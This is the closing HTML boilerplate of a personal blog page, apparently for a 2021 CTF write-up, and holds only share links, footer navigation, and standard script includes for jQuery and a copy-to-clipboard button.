  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2021/10/25/2021-%E5%BC%BA%E7%BD%91%E6%8B%9F%E6%80%81-WP/&text=2021_强网拟态_WP"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2021/10/25/2021-%E5%BC%BA%E7%BD%91%E6%8B%9F%E6%80%81-WP/&title=2021_强网拟态_WP"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2021/10/25/2021-%E5%BC%BA%E7%BD%91%E6%8B%9F%E6%80%81-WP/&is_video=false&description=2021_强网拟态_WP"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=2021_强网拟态_WP&body=Check out this article: http://example.com/2021/10/25/2021-%E5%BC%BA%E7%BD%91%E6%8B%9F%E6%80%81-WP/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2021/10/25/2021-%E5%BC%BA%E7%BD%91%E6%8B%9F%E6%80%81-WP/&title=2021_强网拟态_WP"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2021/10/25/2021-%E5%BC%BA%E7%BD%91%E6%8B%9F%E6%80%81-WP/&title=2021_强网拟态_WP"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2021/10/25/2021-%E5%BC%BA%E7%BD%91%E6%8B%9F%E6%80%81-WP/&title=2021_强网拟态_WP"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2021/10/25/2021-%E5%BC%BA%E7%BD%91%E6%8B%9F%E6%80%81-WP/&title=2021_强网拟态_WP"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2021/10/25/2021-%E5%BC%BA%E7%BD%91%E6%8B%9F%E6%80%81-WP/&name=2021_强网拟态_WP&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2021/10/25/2021-%E5%BC%BA%E7%BD%91%E6%8B%9F%E6%80%81-WP/&t=2021_强网拟态_WP"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2021
    Du1L0v3
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Articles</a></li>
         
          <li><a href="/categories/">Categories</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/links/">Links</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a target="_blank" rel="noopener" href="https://github.com/duitutu">Projects</a></li>
        
         <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
         <span id="busuanzi_container_site_pv">本站总访问量<span id="busuanzi_value_site_pv"></span>次</span>
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdn.bootcdn.net/ajax/libs/font-awesome/5.15.2/css/all.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdn.bootcdn.net/ajax/libs/jquery/3.6.0/jquery.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.bootcdn.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->


</body>
</html>
